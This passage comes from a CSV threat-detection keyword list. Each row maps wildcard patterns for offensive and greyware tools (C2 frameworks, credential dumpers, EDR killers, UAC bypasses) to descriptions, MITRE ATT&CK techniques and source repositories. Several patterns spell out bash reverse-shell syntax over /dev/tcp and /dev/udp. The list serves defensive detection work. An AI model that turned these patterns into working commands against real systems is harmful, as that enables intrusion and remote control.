Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*sh >/dev/tcp/* <&1 2>&1*","greyware_tool_keyword","bash","Equation Group reverse shell method - simple bash reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*sh -c *ping -c 2 %s grep %s /proc/net/arp >/tmp/gx *","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - 
T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*sh -i >& /dev/udp/*/* 0>&1*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*Sha-2-*512.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Sha-2-256.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Sha-2-384.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*shadawck/glit*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*shadawck/nse-install*","greyware_tool_keyword","nmap","Install 
and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*shadawck/recon-archy*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*shadow_copy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*shadowclock*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*shadowclone *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*shadowcoerce.py *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*shadowcoerce_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash 
script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*shadowcopy enum*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*shadowdump.*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*ShadowForge.py*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" +"*ShadowForgeC2-main*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine 
from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" +"*ShadowSpray recovered*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" +"*ShadowSpray.Asn1*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" +"*ShadowSpray.exe*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" +"*ShadowSpray.Kerb*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" 
+"*ShadowSpray.sln*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" +"*ShadowSpray-master*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" +"*ShadowUser/scvhost.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*shareenum.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*shareenumeration*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*SharepointExploiter.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*SharepointSiteExploiter.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*Shares/cme_spider_plus*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Shares/finduncshar_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*sharkd -a tcp:*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - 
TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*Sharp Compile*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","0","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" +"*Sharp_v4_x64*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 
- T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Sharp_v4_x86*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*sharpadidnsdump.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpAdidnsdumpManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpAdidnsdumpMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net 
Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpAllowedToAct.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sharpapplocker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpAppLocker.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpAzbelt-main*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","1","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" +"*SharpBlackout* -p *","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" +"*SharpBlackOut.csproj*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" +"*SharpBlackout.exe*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" +"*SharpBlackOut.pdb*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" +"*SharpBlackOut.sln*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" +"*SharpBlackout-main*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" +"*SharpBlock -*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" +"*SharpBlock.csproj*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" +"*SharpBlock.exe*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" +"*SharpBlock.sln*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" +"*SharpBypassUAC*","offensive_tool_keyword","AD exploitation cheat sheet","Use SharpBypassUAC e.g. from a CobaltStrike beacon","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*SharpBypassUAC.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpC2 *","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*SharpC2*.cs*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - 
T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*SharpC2*.exe*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*sharpc2*client-windows.zip*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*SharpC2.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*SharpC2.API*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*SharpC2Event*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*SharpC2Hub*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - 
